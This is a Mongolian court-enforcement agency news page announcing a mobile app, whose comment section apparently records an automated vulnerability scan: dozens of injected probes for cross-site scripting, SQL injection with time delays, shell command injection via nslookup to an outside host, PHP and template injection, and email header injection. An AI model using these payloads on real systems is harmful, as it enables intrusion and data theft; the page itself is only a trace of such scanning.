ШҮҮХИЙН ШИЙДВЭР ГҮЙЦЭТГЭХ ЕРӨНХИЙ ГАЗАР

ШИЙДВЭР ГҮЙЦЭТГЭХ АЛБА

"Талуудын систем" гар утасны аппликейшн хэрэглээнд нэвтэрлээ.
Нийтлэгдсэн 2019-09-07 11:27:00 | Үзсэн: 1

2019-09-07 11:27:00
Сэтгэгдэл бичих

Нэр :
Таны и-мэйл :
Сэтгэгдэл :
Энд дарж зурган кодыг шинэчилнэ үү
Нийт сэтгэгдэл
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20LC9KV[!+!]
2019-09-07 11:27:00
nqbbfscu :
20sFYK3 ymwz(9548)
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20}body{acu:Expre/**/SSion(ymwz(9295))}
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
[url=http://www.vulnweb.com][/url]
2019-09-07 11:27:00
nqbbfscu :
2019-09-07 11:27:00
nqbbfscu :
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
2019-09-07 11:27:00
nqbbfscu :
20<ScRiPt>ymwz(9049)</sCripT>
2019-09-07 11:27:00
nqbbfscu :
20\u003CScRiPt\ymwz(9259)\u003C/sCripT\u003E
2019-09-07 11:27:00
nqbbfscu :
%32%30%3C%53%63%52%69%50%74%20%3E%79%6D%77%7A%289870%29%3C%2F%73%43%72%69%70%54%3E
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20
2019-09-07 11:27:00
nqbbfscu :
20ymwz(9923)
2019-09-07 11:27:00
nqbbfscu :
20ymwz(9334)
2019-09-07 11:27:00
nqbbfscu :
20ymwz(9023)
2019-09-07 11:27:00
nqbbfscu :
20XYPYR[!+!]
2019-09-07 11:27:00
nqbbfscu :
20ymwz(9288)
2019-09-07 11:27:00
nqbbfscu :
{{10000449*9999201}}
2019-09-07 11:27:00
nqbbfscu :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-09-07 11:27:00
nqbbfscu :
acux9872z1z2abcxuca9872
2019-09-07 11:27:00
nqbbfscu :
acu7718<s1﹥s2ʺs3ʹuca7718
2019-09-07 11:27:00
nqbbfscu :
209535852
2019-09-07 11:27:00
nqbbfscu :
'"()&%ymwz(9630)
2019-09-07 11:27:00
nqbbfscu :
20'"()&%ymwz(9040)
2019-09-07 11:27:00
psycxoja :
1acuAYHDlZQcrg
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20BIDKJ[!+!]
2019-09-07 11:27:00
ctbkhmsl :
205agqv xXBS(9603)
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20}body{acu:Expre/**/SSion(xXBS(9018))}
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
[url=http://www.vulnweb.com][/url]
2019-09-07 11:27:00
ctbkhmsl :
2019-09-07 11:27:00
ctbkhmsl :
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
2019-09-07 11:27:00
ctbkhmsl :
20<ScRiPt>xXBS(9359)</sCripT>
2019-09-07 11:27:00
ctbkhmsl :
20\u003CScRiPt\xXBS(9134)\u003C/sCripT\u003E
2019-09-07 11:27:00
ctbkhmsl :
%32%30%3C%53%63%52%69%50%74%20%3E%78%58%42%53%289148%29%3C%2F%73%43%72%69%70%54%3E
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20
2019-09-07 11:27:00
ctbkhmsl :
20xXBS(9153)
2019-09-07 11:27:00
ctbkhmsl :
20xXBS(9891)
2019-09-07 11:27:00
ctbkhmsl :
20xXBS(9745)
2019-09-07 11:27:00
ctbkhmsl :
20FUDWS[!+!]
2019-09-07 11:27:00
ctbkhmsl :
20xXBS(9742)
2019-09-07 11:27:00
ctbkhmsl :
{{10000085*10000477}}
2019-09-07 11:27:00
ctbkhmsl :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-09-07 11:27:00
acejnovh :
''""
2019-09-07 11:27:00
acejnovh :
JyI=
2019-09-07 11:27:00
acejnovh :
@@nfL4a
2019-09-07 11:27:00
ctbkhmsl :
acux2040z1z2abcxuca2040
2019-09-07 11:27:00
ctbkhmsl :
acu3826<s1﹥s2ʺs3ʹuca3826
2019-09-07 11:27:00
ctbkhmsl :
209945190
2019-09-07 11:27:00
ctbkhmsl :
'"()&%xXBS(9235)
2019-09-07 11:27:00
opskjsgj :
2019-09-07 11:27:00
ctbkhmsl :
20'"()&%xXBS(9225)
2019-09-07 11:27:00
aslqgpnd :
${@print(md5(acunetix_wvs_security_test))}
2019-09-07 11:27:00
aslqgpnd :
${@print(md5(acunetix_wvs_security_test))}\
2019-09-07 11:27:00
wjbhxopd :
467'
2019-09-07 11:27:00
aslqgpnd :
";print(md5(acunetix_wvs_security_test));$a="
2019-09-07 11:27:00
aslqgpnd :
;print(md5(acunetix_wvs_security_test));
2019-09-07 11:27:00
aslqgpnd :
';print(md5(acunetix_wvs_security_test));$a='
2019-09-07 11:27:00
wjbhxopd :
20';copy (select '') to program 'nslookup dns.sqli.\013405.85-748.85.8738d.\1.bxss.me
2019-09-07 11:27:00
wjbhxopd :
'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-746.85.8738d.1.bxss'||'.me')||'
2019-09-07 11:27:00
wjbhxopd :
20;copy (select '') to program 'nslookup dns.sqli.\013405.85-747.85.8738d.\1.bxss.me'
2019-09-07 11:27:00
wjbhxopd :
lk56IZRa'));select pg_sleep(3); --
2019-09-07 11:27:00
wjbhxopd :
20||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-745.85.8738d.1.bxss'||'.me')
2019-09-07 11:27:00
wjbhxopd :
NstiEelD');select pg_sleep(3); --
2019-09-07 11:27:00
oxxosfmx :
/www.vulnweb.com
2019-09-07 11:27:00
epmhywfi :
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2019-09-07 11:27:00
lrnkwbxn :
news/.
2019-09-07 11:27:00
lrnkwbxn :
news
2019-09-07 11:27:00
ocypftis :
http://hitja9EXHxRnG.bxss.me/
2019-09-07 11:27:00
cpoayjdn :
http://testasp.vulnweb.com/t/xss.html?%00.jpg
2019-09-07 11:27:00
wjbhxopd :
-1));select pg_sleep(3); --
2019-09-07 11:27:00
wjbhxopd :
-1;select pg_sleep(9); --
2019-09-07 11:27:00
wjbhxopd :
-1);select pg_sleep(3); --
2019-09-07 11:27:00
wjbhxopd :
HDcxUA0q'; waitfor delay '0:0:9' --
2019-09-07 11:27:00
wjbhxopd :
-1); waitfor delay '0:0:9' --
2019-09-07 11:27:00
wjbhxopd :
1 waitfor delay '0:0:9' --
2019-09-07 11:27:00
wjbhxopd :
-1; waitfor delay '0:0:9' --
2019-09-07 11:27:00
wjbhxopd :
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
2019-09-07 11:27:00
wjbhxopd :
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
2019-09-07 11:27:00
wjbhxopd :
-1 OR 3+984-984-1=0+0+0+1
2019-09-07 11:27:00
wjbhxopd :
-1 OR 2+984-984-1=0+0+0+1
2019-09-07 11:27:00
wjbhxopd :
-1 OR 2+873-873-1=0+0+0+1 --
2019-09-07 11:27:00
pruhvhpd :
^(#$!@#$)(()))******
2019-09-07 11:27:00
wjbhxopd :
-1 OR 3+873-873-1=0+0+0+1 --
2019-09-07 11:27:00
fuagsuvy :
http://testasp.vulnweb.com/t/fit.txt?.jpg
2019-09-07 11:27:00
wjbhxopd :
1*1*1*20
2019-09-07 11:27:00
pruhvhpd :
!(()&&!|*|*|
2019-09-07 11:27:00
fuagsuvy :
testasp.vulnweb.com
2019-09-07 11:27:00
wjbhxopd :
1*1*1*20
2019-09-07 11:27:00
mronkdhs :
'"()
2019-09-07 11:27:00
fuagsuvy :
Http://testasp.vulnweb.com/t/fit.txt
2019-09-07 11:27:00
wjbhxopd :
1*1*1*20
2019-09-07 11:27:00
fuagsuvy :
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2019-09-07 11:27:00
wjbhxopd :
1*1*1*20
2019-09-07 11:27:00
wjbhxopd :
T9iZBGCu
2019-09-07 11:27:00
deqwqghw :
20&n924200=v948238
2019-09-07 11:27:00
sfsjnsgq :
${9999252+10000357}
2019-09-07 11:27:00
ertanxop :
to@example.com> bcc:013405.85-734.85.8738d.1@bxss.me
2019-09-07 11:27:00
ertanxop :
20 bcc:013405.85-733.85.8738d.1@bxss.me
2019-09-07 11:27:00
ehiimrcu :
DwVNfCXQ
2019-09-07 11:27:00
tluentkd :
$(nslookup dns.ce.\013405.85-716.85.8738d.\1.bxss.me)
2019-09-07 11:27:00
tluentkd :
&nslookup dns.ce.\013405.85-718.85.8738d.\1.bxss.me&'\"`0&nslookup dns.ce.\013405.85-718.85.8738d.\1.bxss.me&`'
2019-09-07 11:27:00
tluentkd :
set|set&set
2019-09-07 11:27:00
oqqdqjhb :
20'>">
2019-09-07 11:27:00
idewhxkp :
"+response.write(9970256*9194057)+"
2019-09-07 11:27:00
idewhxkp :
response.write(9970256*9194057)
2019-09-07 11:27:00
idewhxkp :
'+response.write(9970256*9194057)+'
2019-09-07 11:27:00
oqqdqjhb :
20
2019-09-07 11:27:00
Нийслэлийн шийдвэр гүйцэтгэх газар
 • Утас :
  70001480
 • Факс :
  70001482
 • Имэйл :
  shgg@cd.gov.mn
 • Манай хаяг :

  Улаанбаатар хот, Сүхбаатар дүүрэг, 10-р хороо, Цагдаагийн гудамж ШШГЕГ-ын хоёрдугаар байр